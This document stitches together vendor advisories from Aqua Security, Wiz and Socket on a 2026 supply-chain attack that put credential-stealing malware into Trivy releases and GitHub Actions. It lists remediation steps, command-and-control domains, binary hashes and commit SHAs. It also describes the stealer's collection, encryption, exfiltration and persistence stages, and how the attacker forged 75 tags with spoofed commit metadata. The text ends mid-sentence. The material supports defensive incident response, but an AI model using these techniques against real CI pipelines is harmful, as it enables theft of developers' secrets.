    Docker Hub, GHCR, and ECR, have been deleted. [UPDATE — Source:
    Wiz/Socket]
    This includes the subsequently published Docker Hub
    images tagged 0.69.5 and 0.69.6.

  • Tag restoration: All
    compromised version tags have been deleted or repointed to known-safe,
    verified commits.

  • Credential revocation: A
    comprehensive lockdown of all automated actions, service accounts, and
    tokens across the Aqua Security open-source organization has been
    implemented.

  • Access control hardening: Stricter
    safeguards have been implemented around automation and token usage,
    including tightened permissions and reduced reliance on long-lived
    credentials.

  • Immutable release
    enforcement:
    We are implementing immutable release
    verification and provenance attestations for all future deployments.

  • Ongoing monitoring: We
    continue to analyze the full scope of the incident and monitor for signs
    of downstream impact.

GitHub Security Advisory: GHSA-cxm3-wv7p-598c

Ongoing updates: github.com/aquasecurity/trivy/discussions/10425

Required
Actions for the Community

For users of open source Trivy, immediate action is
required.

Step
1: Update to Known-Safe Versions























Component



Safe
Version



Reference



Trivy
binary



v0.69.2–v0.69.3



GitHub
Releases



trivy-action



v0.35.0



GitHub
Action



setup-trivy



v0.2.6



GitHub
Action


Step
2: Rotate All Potentially Exposed Secrets

If there is any possibility that a
compromised version ran in your environment, all secrets accessible to affected
pipelines must be treated as exposed and rotated immediately:


  • Credentials
    for cloud providers (AWS, GCP, Azure)

  • Source
    control and Git credentials

  • Container
    registry credentials

  • SSH
    keys and Kubernetes tokens

  • Environment
    variables and other automation secrets

  • NPM
    publish tokens:
    treat as actively compromised; stolen tokens
    are being weaponized to propagate malware across the NPM ecosystem.

  • **Cryptocurrency
    wallets and validator keys
    :
    Bitcoin, Litecoin, Dogecoin,
    Zcash, Dash, Ripple, Monero configs; Ethereum keystores; Cardano
    signing/verification keys; Solana keypairs (validator-keypair.json,
    vote-account-keypair.json, identity.json); Ledger device files; Anchor
    deploy keys. Rotate or transfer to new wallets immediately.

  • **Database
    credentials
    :
    ~/.pgpass, ~/.my.cnf, ~/.mongorc.js, Redis
    config files, and environment variables matching DATABASE, DB_, MYSQL,
    POSTGRES, MONGO, REDIS, VAULT.

  • **TLS
    private keys:
    *.key, *.pem, *.p12, *.pfx, including
    /etc/ssl/private/ and /etc/letsencrypt/.

  • **VPN
    configurations
    :
    WireGuard configuration files in
    /etc/wireguard/.

Step
3: Audit Trivy Versions

Check whether your organization
pulled or executed Trivy v0.69.4 from any source. Remove any affected artifacts
immediately.

Also check for Docker images tagged 0.69.5 and 0.69.6,
published to Docker Hub on March 22.

Step
4: Audit GitHub Action References

Review all workflows using
aquasecurity/trivy-action or aquasecurity/setup-trivy. Check workflow run logs
from March 19–20, 2026, for signs of compromise.

Also review any workflows
referencing aquasecurity/kics-github-action, which was subject to a parallel
compromise identified on March 23.

Step
5: Search for Exfiltration Artifacts

Look for repositories named
tpcp-docs in your GitHub organization. The presence of such a repository may
indicate successful exfiltration via the fallback mechanism.

*On developer machines where
the malicious Trivy binary may have been executed, check for the persistence
dropper at ~/.config/systemd/user/sysmon.py and associated systemd user unit
files. Remove immediately if found.

Step
6: Long-Term Hardening — Pin to Full SHA Hashes

Pin GitHub Actions to full, immutable commit SHA
hashes — not mutable version tags.
Version tags can be moved to
point at malicious commits.

Example:

UNSAFE: uses:
aquasecurity/[email protected]

SAFE:  
uses: aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1

**Note: GitHub’s “Immutable” release badge does not
prevent tag force-pushing. Pinning to full commit SHA remains the only reliable
protection.

# UNSAFE — mutable tag, can be silently redirected to
malicious code

uses: aquasecurity/[email protected]

# SAFE — pinned to an immutable commit SHA

uses:
aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1

Indicators of Compromise (IOCs)

Network and Infrastructure IOCs






































Indicator
Type



IOC
Value



Recommended
Action



Network
C2



scan.aquasecurtiy[.]org



Block
at network perimeter; hunt DNS logs



Network
IP



45.148.10.212



Block
at firewall; search outbound connections



Secondary
C2



plug-tab-protective-relay.trycloudflare.com



Search
DNS logs; flag for exfiltration



GitHub
Exfil



Repository:
tpcp-docs



Search
GitHub org for unauthorized repo creation



Compromised
Binary



trivy
v0.69.4



Search
container registries and CI caches



ICP
Blockchain C2



tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io



Block
egress to icp0.io


Malicious Binary Hashes

*SHA-256 hashes of the malicious Trivy v0.69.4
binaries:















































Hash
(SHA-256)



Platform



887e1f5b5b50162a60bd03b66269e0ae545d0aef0583c1c5b00972152ad7e073



FreeBSD-64bit



f7084b0229dce605ccc5506b14acd4d954a496da4b6134a294844ca8d601970d



Linux-32bit



822dd269ec10459572dfaaefe163dae693c344249a0161953f0d5cdd110bd2a0



Linux-64bit



bef7e2c5a92c4fa4af17791efc1e46311c0f304796f1172fce192f5efc40f5d7



Linux-ARM



e64e152afe2c722d750f10259626f357cdea40420c5eedae37969fbf13abbecf



Linux-ARM64
(unconfirmed)



ecce7ae5ffc9f57bb70efd3ea136a2923f701334a8cd47d4fbf01a97fd22859c



Linux-PPC64LE



d5edd791021b966fb6af0ace09319ace7b97d6642363ef27b3d5056ca654a94c



Linux-s390x



e6310d8a003d7ac101a6b1cd39ff6c6a88ee454b767c1bdce143e04bc1113243



macOS-64bit



6328a34b26a63423b555a61f89a6a0525a534e9c88584c815d937910f1ddd538



macOS-ARM64



0880819ef821cff918960a39c1c1aada55a5593c61c608ea9215da858a86e349



Windows-64bit


**SHA-256 hash of the malicious
GitHub Action payload:

18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a
— entrypoint.sh (injected into trivy-action and setup-trivy)

Compromised
GitHub Action Workflow Hashes

**The full catalog of all 75 compromised trivy-action
tags and 7 setup-trivy tags is maintained by Socket at: socket.dev/supply-chain-attacks/trivy-github-actions-compromise

setup-trivy
(7 tags):



































Action



Malicious
Commit SHA



setup-trivy



8afa9b9f9183b4e00c46e2b82d34047e3c177bd0



setup-trivy



386c0f18ac3d7f2ed33e2d884761119f4024ff8a



setup-trivy



384add36b52014a0f99c0ab3a3d58bd47e53d00f



setup-trivy



7a4b6f31edb8db48cc22a1d41e298b38c4a6417e



setup-trivy



6d8d730153d6151e03549f276faca0275ed9c7b2



setup-trivy



99b93c070aac11b52dfc3e41a55cbb24a331ae75



setup-trivy



f4436225d8a5fd1715d3c2290d8a50643e726031


trivy-action
(representative sample of 75 tags):







































Tag



Malicious
Commit SHA



0.0.1



f77738448eec70113cf711656914b61905b3bd47



0.16.0



f4f1785be270ae13f36f6a8cfbf6faaae50e660a



0.18.0



85cb72f1e8ee5e6e44488cd6cbdbca94722f96ed



0.25.0



ddb94181dcbc723d96ffc07fddd14d97e4849016



0.30.0



ad623e14ebdfe82b9627811d57b9a39e283d6128



0.33.0



19851bef764b57ff95b35e66589f31949eeb229d



0.34.0



ab6606b76e5a054be08cab3d07da323e90e751e8



0.34.2



ddb9da4475c1cef7d5389062bdfdfbdbd1394648


A
Note to the Broader Ecosystem

We would also like to recognize and
thank our industry partners and the broader security community for their role
in helping contain this situation. As an open source project, Trivy does not
maintain a comprehensive record of its user base. While it is widely adopted
across organizations of all sizes, there is no centralized way to notify every
user directly. In this context, the rapid response from researchers, partners,
and community members has been invaluable.

By identifying suspicious behavior,
publishing analyses, and sharing guidance across channels, the community has
helped ensure that critical information reached users quickly. We particularly
thank the research teams at Aikido Security and CrowdStrike for their rapid
technical publications, which materially accelerated response and community
awareness.

We additionally recognize the
contributions of Wiz Research(*) and Socket Security(**), whose independent
analyses provided critical technical depth to the community response. Wiz
Research published a comprehensive advisory that includes the SITF threat model
diagram, a full binary hash IOC set, and formal threat actor tracking for
TeamPCP (wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack).
Socket Security published detailed payload reverse-engineering, the complete
catalog of all 75 compromised trivy-action workflow hashes, and an ongoing
campaign tracking dashboard (socket.dev/blog/trivy-under-attack-again).

What’s
Next

This remains an active investigation,
and we are committed to continuing to share updates as more information becomes
available. As confirmed by community researchers at Aikido Security and
CrowdStrike, the threat actor has pivoted beyond the initial CI/CD compromise
and is actively weaponizing stolen credentials across the broader ecosystem.
Organizations should treat this as an ongoing campaign, not a contained
incident.

The threat actor has expanded
operations to the npm ecosystem via a self-propagating worm dubbed
“CanisterWorm,” leveraging stolen NPM publish tokens exfiltrated from
compromised CI/CD pipelines. Aikido Security documented this worm at aikido.dev/blog/teampcp-deploys-worm-npm-trivy-compromise.
The use of stolen publish tokens to propagate malware across the NPM package
registry represents a significant escalation of the campaign’s downstream
impact.

Incidents like this underscore a
broader reality in today’s threat landscape. Even widely trusted security tools
can become targets. As attackers increasingly focus on software supply chains,
transparency, rapid response, and community collaboration are essential to
minimizing impact.

Trivy Compromised

 (https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack)

On March 19, 2026, threat actors
injected credential-stealing malware into Aqua Security’s Trivy scanner and
related GitHub Actions. Learn how "TeamPCP" executed this breach and
how to audit your environment.

Update March 23, 17:40 UTC: Wiz Research has identified
a parallel compromise
of kics-github-action



On March 19, 2026, threat actors compromised
Aqua Security's Trivy vulnerability
scanner, injecting credential-stealing malware into official releases and
GitHub Actions. While Aqua
reports
they have since removed the malicious releases,
organizations using Trivy should audit their environments immediately. 

Update
March 22, 13:15 UTC
: Wiz Research continues to track TeamPCP activity following
the initial Trivy compromise. The threat actor has expanded operations to the
npm ecosystem via a worm ("CanisterWorm") leveraging stolen publish
tokens. Additionally, the ICP-hosted fallback C2 (tdtqy-oyaaa-aaaae-af2dq-cai)
is now actively serving an iteratively developed payload (kamikaze.sh). Aqua
has published a blog post and a GitHub Security Advisory.

Update
March 22, 21:40 UTC:
~16:00 UTC, attackers were able to publish
malicious images of Trivy (0.69.5, 0.69.6) to Docker Hub. The attacker has
also demonstrated continued access to Aqua by publishing internal Aqua
repositories publicly on GitHub. As of 21:31 UTC, the IPC Canister has been
made "Unavailable Due to Policy Violation." We continue to monitor
the situation.



Update March 23,
19:26 UTC
:
Aqua's blog post has been updated with additional details.



Note:
this
incident is distinct from the previous instance earlier this month,
where MegaGame10418 exploited a PWN request, that was also later
flagged by hackerbot-claw. Customers can refer to the
Threat Center Advisory on the previous incident
.

What
happened?

Wiz Research, in concert with other
industry parties, identified a multi-faceted supply chain attack targeting Aqua
Security's Trivy. The attack compromised multiple components of the
Trivy project: the core scanner, the trivy-action GitHub Action, and
the setup-trivy GitHub Action
.

The attack was conducted with access
retained following incomplete containment of the earlier incident
.



The threat actor, self-identifying
as TeamPCP
, made imposter commits that were pushed
to actions/checkout (while spoofing user rauchg) and
to aquasecurity/trivy (while spoofing user DmitriyLewen). At
17:43:37 UTC, the Trivy repository’s v0.69.4 tag was pushed,
triggering a release. This resulted in a malicious checkout that fetched credential
stealer code
from a typosquatted domain (scan.aquasecurtiy[.]org,
resolving to 45.148.10.212), and backdoored binaries being published to
GitHub Releases, Docker Hub, GHCR, and ECR. The maintainers have since removed
these malicious artifacts.

The attacker also compromised
the aqua-bot service account and then abused their access push
malicious workflows to tfsec, traceeshark,
and trivy-action and steal additional credentials from Aqua
(including GPG keys and credentials for Docker Hub, Twitter, and Slack). These
secrets were exfiltrated to a Cloudflare Tunnel C2
(plug-tab-protective-relay.trycloudflare.com). Furthermore, 75 out of
76
trivy-action tags were force-pushed to malicious versions,
and 7
setup-trivy tags were force-pushed as well. 

The malicious versions of these
Actions run a tool self-described as "TeamPCP Cloud stealer", which
dumps Runner.Worker process memory, harvests SSH, cloud, and K8s
secrets, encrypts the data (using AES-256+RSA-4096), and exfiltrates it to a
remote server. The malware is configured to create a repository
named tpcp-docs in the victim's GitHub account as a fallback method.

What
did the malicious GitHub workflows do?

The attacker injected the same
three-stage payload into both trivy-action (in entrypoint.sh)
and setup-trivy (in action.yaml). When a downstream workflow
executed either action, the payload ran on the victim's GitHub Actions runner:


  1. Collection:
    The malware scraped memory from the Runner.Worker process by
    reading /proc//mem and searching for the
    pattern {"value":"","isSecret":true}.
    It also swept the filesystem for SSH keys, cloud credentials  (AWS,
    GCP, Azure), Kubernetes tokens, and cryptocurrency wallets across 50+
    sensitive file paths.

  2. Encryption:
    Harvested credentials were encrypted using AES-256-CBC with RSA-4096
    hybrid encryption and bundled into tpcp.tar.gz

  3. Exfiltration:
    The malware transmitted the encrypted bundle to a typosquatted domain
    (scan.aquasecurtiy[.]org). As a fallback, it could create
    a tpcp-docs repository in the victim's GitHub account and upload
    the stolen credentials  as a release asset.

What
did the malicious Trivy binary (v0.69.4) do?

When the malicious binary is
executed it starts both the legitimate trivy service and the malicious code in
parallel. In our initial analysis the malicious code exfiltrates secrets with a
primary and backup mechanism. If it detects it is on a developer machine it
additionally writes a base64 encoded python dropper for persistence.

Data
Theft

The malicious process gathers
environmental variables, sweeps the system for any credentials stored in the
filesystem and enumerates the network interface. It then compresses and
encrypts the data and attempts to exfiltrate it via post request to https://scan.aquasecurtiy[.]org.
If that fails (returns a non-2xx status code), the malware then attempts to use
a stolen GITHUB_TOKEN to create a repo tpcp-docs and post the data
there. 

Set
Persistence

The malicious code attempts to
identify if it is on a developer machine by checking if the environmental
variable GITHUB_ACTIONS != “true”. If that check passes, the malware
attempts to create persistence by writing a python script as ~/.config/systemd/user/sysmon.py and
creating a systemd unit that persistently runs the python script.

sysmon.py initially sleeps for
five minutes and then
polls https://tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io/. If a non-youtube
link is found there the dropper downloads to /tmp/pglog and executes
it in a new session. 

At the time of analysis (10:30 AM
EST/15:30 UTC) the malicious site was set to a RickRoll, but it could be
changed by the attacker at any time. 

Which
actions should security teams take?


  1.  Audit
    Trivy versions
    : Check whether your organization pulled or executed
    Trivy v0.69.4 from any source (GitHub Releases, container
    registries, etc.). Remove any affected artifacts immediately.

  2.  Audit
    GitHub Action references
    : Review workflows
    using aquasecurity/trivy-action or aquasecurity/setup-trivy.
    If you referenced a version tag rather than a SHA, check workflow run logs
    from March 19-20 for signs of compromise. Specifically, you can look in
    the Run Trivy step of trivy-action and the Setup
    environment step of setup-trivy.

  3.  Search
    for exfiltration artifacts
    : Look for repositories
    named tpcp-docs in your GitHub organization, which may indicate
    successful exfiltration via the fallback mechanism. Hunt based on the IOCs
    provided below.

Long-term hardening: Pin
GitHub Actions to full SHA hashes, not version tags. Version tags can be moved
to point at malicious commits, as demonstrated in this attack.

How
Wiz can help?

Wiz customers should refer to and
monitor the advisory in the Wiz
Threat Center
for ongoing guidance, pre-built queries, and
references to relevant detections they can use to assess the risk  in
their environment.

Worried you’ve been
impacted?
Connect
with the Wiz Incident Response team
.

Appendix

SITF diagram

 

Indicators of compromise

Network Indicators

























Indicator



Notes



scan.aquasecurtiy.org



Typosquatted C2



45.148.10.212



TECHOFF SRV LIMITED, Amsterdam



tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io



ICP-hosted fallback within
malicious Trivy binary



plug-tab-protective-relay.trycloudflare.com



Used within GitHub Actions for
exfiltration


 

Malicious Artifacts




























































Type



Value



Details



IOC (Hash)



887e1f5b5b50162a60bd03b66269e0ae545d0aef0583c1c5b00972152ad7e073



FreeBSD-64bit



IOC (Hash)



f7084b0229dce605ccc5506b14acd4d954a496da4b6134a294844ca8d601970d



Linux-32bit



IOC (Hash)



822dd269ec10459572dfaaefe163dae693c344249a0161953f0d5cdd110bd2a0



Linux-64bit



IOC (Hash)



bef7e2c5a92c4fa4af17791efc1e46311c0f304796f1172fce192f5efc40f5d7



Linux-ARM



IOC (Hash)



e64e152afe2c722d750f10259626f357cdea40420c5eedae37969fbf13abbecf



Linux-ARM64 (unconfirmed)



IOC (Hash)



ecce7ae5ffc9f57bb70efd3ea136a2923f701334a8cd47d4fbf01a97fd22859c



Linux-PPC64LE



IOC (Hash)



d5edd791021b966fb6af0ace09319ace7b97d6642363ef27b3d5056ca654a94c



Linux-s390x



IOC (Hash)



e6310d8a003d7ac101a6b1cd39ff6c6a88ee454b767c1bdce143e04bc1113243



macOS-64bit



IOC (Hash)



6328a34b26a63423b555a61f89a6a0525a534e9c88584c815d937910f1ddd538



macOS-ARM64



IOC (Hash)



0880819ef821cff918960a39c1c1aada55a5593c61c608ea9215da858a86e349



Windows-64bit


Malicious Workflows

Credit to Socket for compiling
this data and making it easily available at
https://socket.dev/supply-chain-attacks/trivy-github-actions-compromise

















































































































































































































































































































































Action



Hash



setup-trivy



8afa9b9f9183b4e00c46e2b82d34047e3c177bd0



setup-trivy



386c0f18ac3d7f2ed33e2d884761119f4024ff8a



setup-trivy



384add36b52014a0f99c0ab3a3d58bd47e53d00f



setup-trivy



7a4b6f31edb8db48cc22a1d41e298b38c4a6417e



setup-trivy



6d8d730153d6151e03549f276faca0275ed9c7b2



setup-trivy



99b93c070aac11b52dfc3e41a55cbb24a331ae75



setup-trivy



f4436225d8a5fd1715d3c2290d8a50643e726031



trivy-action



f4f1785be270ae13f36f6a8cfbf6faaae50e660a



trivy-action



0891663bc55073747be0eb864fbec3727840945d



trivy-action



2e7964d59cd24d1fd2aa4d6a5f93b7f09ea96947



trivy-action



ddb9da4475c1cef7d5389062bdfdfbdbd1394648



trivy-action



4209dcadeaea6a7df69262fef1beeda940881d4d



trivy-action



f5c9fd927027beaa3760d2a84daa8b00e6e5ee21



trivy-action



18f01febc4c3cd70ce6b94b70e69ab866fc033f5



trivy-action



bb75a9059c2d5803db49e6ed6c6f7e0b367f96be



trivy-action



d488f4388ff4aa268906e25c2144f1433a4edec2



trivy-action



3c615ac0f29e743eda8863377f9776619fd2db76



trivy-action



a9bc513ea7989e3234b395cafb8ed5ccc3755636



trivy-action



8519037888b189f13047371758f7aed2283c6b58



trivy-action



8cfb9c31cc944da57458555aa398bb99336d5a1f



trivy-action



9092287c0339a8102f91c5a257a7e27625d9d029



trivy-action



7b955a5ece1e1b085c12dac7ac10e0eb1f5b0d4d



trivy-action



19851bef764b57ff95b35e66589f31949eeb229d



trivy-action



61fbe20b7589e6b61eedcd5fe1e958e1a95fbd13



trivy-action



fa78e67c0df002c509bcdea88677fb5e2fe6a9b1



trivy-action



b7befdc106c600585d3eec87d7e98e1c136839ae



trivy-action



7f6f0ce52a59bdfc5757c3982aac2353b58f4c73



trivy-action



ddb6697447a97198bdef9bae00215059eb5e8bc2



trivy-action



3dffed04dc90cf1c548f40577d642c52241ec76c



trivy-action



ad623e14ebdfe82b9627811d57b9a39e283d6128



trivy-action



848d665ed24dc1a41f6b4b7c7ffac7693d6b37be



trivy-action



ddb94181dcbc723d96ffc07fddd14d97e4849016



trivy-action



b7252377a3d82c73d497bfafa3eabe84de1d02c4



trivy-action



fa4209b6182a4c1609ce34d40b67f5cfd7f00f53



trivy-action



2b1dac84ff12ba56158b3a97e2941a587cb20da9



trivy-action



66c90331c8b991e7895d37796ac712b5895dda3b



trivy-action



fd429cf86db999572f3d9ca7c54561fdf7d388a4



trivy-action



8ae5a08aec3013ee8f6132b2a9012b45002f8eaa



trivy-action



2a51c5c5bb1fd1f0e134c9754f1702cfa359c3dd



trivy-action



9c000ba9d482773cbbc2c3544d61b109bc9eb832



trivy-action



91e7c2c36dcad14149d8e455b960af62a2ffb275



trivy-action



4bdcc5d9ef3ddb42ccc9126e6c07faa3df2807e3



trivy-action



9e8968cb83234f0de0217aa8c934a68a317ee518



trivy-action



c5967f85626795f647d4bf6eb67227f9b79e02f5



trivy-action



b745a35bad072d93a9b83080e9920ec52c6b5a27



trivy-action



38623bf26706d51c45647909dcfb669825442804



trivy-action



555e7ad4c895c558c7214496df1cd56d1390c516



trivy-action



2297a1b967ecc05ba2285eb6af56ab4da554ecae



trivy-action



820428afeb64484d311211658383ce7f79d31a0a



trivy-action



f77738448eec70113cf711656914b61905b3bd47



trivy-action



252554b0e1130467f4301ba65c55a9c373508e35



trivy-action



22e864e71155122e2834eb0c10d0e7e0b8f65aa3



trivy-action



405e91f329294fb696f55793203abf1f6aba9b40



trivy-action



506d7ff06abc509692c600b5b69b4dc6ceaa4b15



trivy-action



276ca9680f6df9016db12f7c48571e5c4639451d



trivy-action



aa3c46a9643b18125abb8aefc13219014e9c4be8



trivy-action



ea56cd31d82b853932d50f1144e95b21817e52cf



trivy-action



0d49ceb356f7d4735c63bd0d5c7e67665ec7f80c



trivy-action



7550f14b64c1c724035a075b36e71423719a1f30



trivy-action



da73ae0790e458e878b300b57ceb5f81ac573b46



trivy-action



6ec7aaf336b7d2593d980908be9bc4fed6d407c6



trivy-action



cf19d27c8a7fb7a8bbf1e1000e9318749bcd82cf



trivy-action



ef3a510e3f94df3ea9fcd01621155ca5f2c3bf5b



trivy-action



6fc874a1f9d65052d4c67a314da1dae914f1daff



trivy-action



b9faa60f85f6f780a34b8d0faaf45b3e3966fdda



trivy-action



ab6606b76e5a054be08cab3d07da323e90e751e8



trivy-action



a5b4818debf2adbaba872aaffd6a0f64a26449fa



trivy-action



e53b0483d08da44da9dfe8a84bf2837e5163699b



trivy-action



8aa8af3ea1de8e968a3e49a40afb063692ab8eae



trivy-action



91d5e0a13afab54533a95f8019dd7530bd38a071



trivy-action



794b6d99daefd5e27ecb33e12691c4026739bf98



trivy-action



9ba3c3cd3b23d033cd91253a9e61a4bf59c8a670



trivy-action



e0198fd2b6e1679e36d32933941182d9afa82f6f



trivy-action



9738180dd24427b8824445dbbc23c30ffc1cb0d8



trivy-action



3201ddddd69a1419c6f1511a14c5945ba3217126



trivy-action



985447b035c447c1ed45f38fad7ca7a4254cb668



trivy-action



3d1b5be1589a83fc98b82781c263708b2eb3b47b



trivy-action



fd090040b5f584f4fcbe466878cb204d0735dcf4



trivy-action



85cb72f1e8ee5e6e44488cd6cbdbca94722f96ed



trivy-action



cf1692a1fc7a47120e6508309765db7e33477946



trivy-action



1d74e4cf63b7cf083cf92bf5923cf037f7011c6b



trivy-action



c19401b2f58dc6d2632cb473d44be98dd8292a93


 

Thu, Mar 19- 12:00 UTC

Imposter
Commit to actions/checkout
– Github -
12:00 UTC

Attacker creates a malicious commit
impersonating rauchg (Guillermo Rauch) in
the actions/checkout repository. Payload fetches malicious Go files
from typosquatted C2 and injects them into the build.

Imposter
Commit to aquasecurity/trivy
- GitHub- 12:00 UTC

Attacker duplicates a prior
legitimate contribution and impersonates DmitriyLewen. This malicious
commit references the imposter checkout action, establishing the attack chain.

Malicious
v0.69.4 Tag Pushed
- GitHub- 17:43:37 UTC

Tag v0.69.4 pushed to
trivy repository, pointing to the malicious commit. This triggers automated
release workflows.

Malicious
Releases Distributed
- 18:22 UTC

Malicious v0.69.4 release artifacts
become publicly accessible on GitHub Releases and container registries (ECR,
Docker Hub, GHCR).

Malicious
GitHub Release Removed
- 21:42 UTC

✓Malicious GitHub Release Removed Aqua removes malicious
v0.69.4 GitHub release (~3 hours exposure window)  

 

Phase
02 – Lateral Movement
 

                              (3 events)

tfsec
Workflow Compromised
- Thu, Mar 19  21:31:23 UTC

Malicious workflow added
to aquasecurity/tfsec using compromised aqua-bot identity.
Workflow dumps secrets, then is reverted.

commit
(aqua-bot)

workflow
run (SCP failed)

               link expired or no longer working

traceeshark
Workflow Compromised
- 21:35:34 UTC

Same attack pattern applied
to aquasecurity/traceeshark. Malicious workflow injected via compromised
bot account.

Aquabot commit

 

trivy-action
Workflow Compromised
- 21:36:28 UTC

               Attack
continues to aquasecurity/trivy-action. This repository is particularly
critical as it's used by thousands of downstream projects.

aquasecurity/trivy-action  Commit 93ed411

Phase 3 Malicious Distribution

                                                            (1 event)

Thu, Mar 19- 22:08 UTC

Malicious
Action Tags Published
Socket.dev

(https://socket.dev/blog/trivy-under-attack-again-github-actions-compromise)

Update — March 22, 2026: Additional
compromised Trivy artifacts have been identified in Docker Hub. New image tags
(0.69.5 and 0.69.6), along with the previously
identified 0.69.4, were found to contain the same infostealer payload,
with latest pointing to a malicious image during the exposure window.
Read our full update on the Docker image compromise here: https://socket.dev/blog/trivy-docker-images-compromised

A new supply chain attack targeting
Trivy has been disclosed
today by Paul McCarty
, marking the second distinct compromise
affecting the Trivy ecosystem in March.

This latest incident impacts GitHub
Actions, and is separate from the earlier
OpenVSX compromise involving the VS Code extension
.

Initial reports have focused on the
compromise of Trivy v0.69.4, with downstream ecosystems such as Homebrew
already rolling back affected versions. The first known detection of suspicious
activity traces back to approximately 19:15 UTC.

However, early findings indicate
the scope of the attack extends beyond a single release.

At Socket, we identified that an
attacker force-pushed 75 out of 76 version tags in the
aquasecurity/trivy-action repository, the official GitHub Action for running
Trivy vulnerability scans in CI/CD pipelines. With over 10,000 workflow files
on GitHub referencing this action, the potential blast radius is significant.
These tags were modified to serve a malicious payload, effectively turning
trusted version references into a distribution mechanism for an infostealer.
These compromised tags remain active at the time of writing.

Any CI/CD pipeline referencing
aquasecurity/trivy-action by version tag, including commonly used tags such as
@0.34.2, @0.33.0, or @0.18.0, is executing malicious code before the legitimate
Trivy scan runs. This may prevent users from noticing any issues. At this time,
@0.35.0 appears to be the only unaffected version tag.

Socket independently detected this
activity in real time. Beginning at 19:15 UTC, Socket generated 182 threat feed
entries tied to malicious GitHub Actions associated with this campaign. All
were correctly classified as Backdoor, Infostealer, or Reconnaissance malware
by Socket’s AI scanner.

Screenshot of the Socket package page for of the compromised
tags of the aquasecurity/trivy-action GitHub Action, showing a "Known
Malware" alert.

The malicious payload is designed
to execute within GitHub Actions runners, targeting sensitive data in CI/CD
environments. Observed behavior includes dumping runner process memory to
extract secrets, harvesting SSH keys, and exfiltrating credentials for AWS,
GCP, and Azure, as well as Kubernetes service account tokens.

This marks the second supply chain incident involving
Trivy in March
. Earlier in the month, a separate compromise affected
the Aqua Trivy VS Code extension distributed via OpenVSX, where injected code
attempted to abuse local AI coding agents.

Socket users can check whether
their workflows are affected in the dashboard under Threat Intel → Campaigns,
or view the public campaign tracker for the Trivy
GitHub Actions Compromise
.

Update
3/20:

Recent updates from the Trivy
maintainers confirm that this attack was enabled by a compromised credential
with write access to the repository. The incident is a continuation of the
earlier March breach, during which credentials were exfiltrated from Trivy’s CI
environment. Although secrets and tokens were rotated in response, the rotation
process was not fully atomic, and the attacker may have retained access to
newly issued credentials. This allowed the threat actor to perform
authenticated operations, including force-updating tags, without needing to
exploit GitHub itself. While the exact credential used in this phase has not
been publicly specified, the root cause is now understood to be residual access
from the earlier credential compromise.

How the Attacker Poisoned 75 Tags Without Touching a
Branch#

The most striking aspect of this
attack is not the payload itself but the delivery mechanism. After getting
access to Trivy’s credentials, the attacker compromised
the aquasecurity/trivy-action GitHub action but not by pushing to a
branch or creating a new release, which would appear in the commit history and
trigger notifications. Instead, the attacker force-pushed 75 existing version
tags to point to new malicious commits. The technique involved multiple layers
of deception that merit close examination.

Recall that a git tag is a pointer
to a commit SHA. When a GitHub Actions workflow
references aquasecurity/[email protected], GitHub resolves that tag to
whatever commit it currently points to. If an attacker with push access
force-updates the tag to a different commit, every workflow referencing that
tag automatically begins pulling the new code.

How Each Tag Was Rewritten#

For each of the 75 tags, the
attacker created a new commit with carefully spoofed metadata:


  1. Started
    from the master HEAD tree
    (57a97c7e), the current file tree
    containing all latest code

  2. Swapped entrypoint.sh with
    the infostealer payload, leaving everything else from master intact

  3. Looked
    up the original commit
    that the tag previously pointed to
    (e.g., the PR #481 merge for tag 0.33.0)

  4. Cloned
    that commit's metadata
    ,
    spanning author name, email,
    committer, both timestamps, and the full commit message including PR
    number and "Fixes" references

  5. Set
    the parent
    to 57a97c7e (master HEAD) rather than
    the original parent

  6. Force-pushed
    the tag
    to this new commit

The result is a file tree that is
identical across all 75 malicious commits, master plus the
swapped entrypoint.sh. Only the commit metadata varies per tag, spoofed to
match each tag's original commit so it appears legitimate in git log.

The GitHub release page for one of
the compromised releases, 0.33.1, showing all the expected metadata and an
"Immutable" badge. However, the tag was force-pushed to a malicious
commit on current master, as betrayed by the "0 commits to master since
this release" comment.

Only a few indicators betray the forgery:


  1. Each
    original commit was GPG-signed by GitHub when merged via the web UI. The
    attacker's commits are unsigned, because the original GitHub web-flow
    signature cannot be recreated.

  2. Each
    commit claims a date from the original release (2021, 2022, etc.) but has
    a parent dated March 2026. This is impossible.

  3. The
    original commits typically touched multiple files. Each malicious commit
    modifies only entrypoint.sh, because the rest of the tree is master
    HEAD rather than the original tag's tree.

GitHub's release UI displays an
"Immutable" badge next to each tag on the releases page of the
compromised action. Immutable releases refer to a newer
GitHub feature
enforcing that release versions, once published,
cannot be altered or deleted.

The attacker might have
deliberately published immutable releases when poisoning the tags, effectively
locking in the malicious state and making it harder for maintainers to restore
the original tag targets.

As this compromise shows,
organizations and downstream users should not rely solely on the
"Immutable" indicator to verify tag integrity. GitHub's own security
guidance recommends pinning actions to full commit SHAs as the only truly
immutable way to consume an action.

On GitHub's release page, each
poisoned tag displays "0 commits to master since this release." For a
tag like 0.6.0 from 2020, this counter should show hundreds of commits. It
reads zero because the malicious commit's parent is master
HEAD; GitHub's comparison logic treats the tag as being at or ahead of master
rather than behind it. This is an easy visual indicator of compromise when
browsing the releases page.

Why Tag 0.35.0 Was Not Poisoned#

Tag 0.35.0 is the sole clean tag. It points to the
latest commit on the master branch, 57a97c7e. The attacker used this
commit as the base tree for generating all 75 malicious commits.
Tag 0.35.0 was not replaced because it already points to the base
commit. The attacker's tooling likely iterated over all tags and skipped the
one that matched the parent. Replacing it would have produced a commit whose
parent is itself, a no-op that would also risk drawing attention to the latest
release, the tag most likely to be monitored.

Payload Overview#

The
malicious entrypoint.sh is 204 lines long. Lines 4 through 105
contain the injected infostealer. Lines 106 through 204 contain the legitimate
Trivy scanning code. Because the malware executes first and the real Trivy scan
follows normally afterward, users see expected scan output and may not notice
that anything is wrong.

The
payload operates in three stages:


  1. Collection (lines
    4–36) — Harvests secrets from runner process memory and the filesystem

  2. Encryption (lines
    39–68) — Encrypts collected data with AES-256-CBC and wraps the key with
    RSA-4096

  3. Exfiltration (lines
    70–104) — Transmits the encrypted bundle to an attacker-controlled
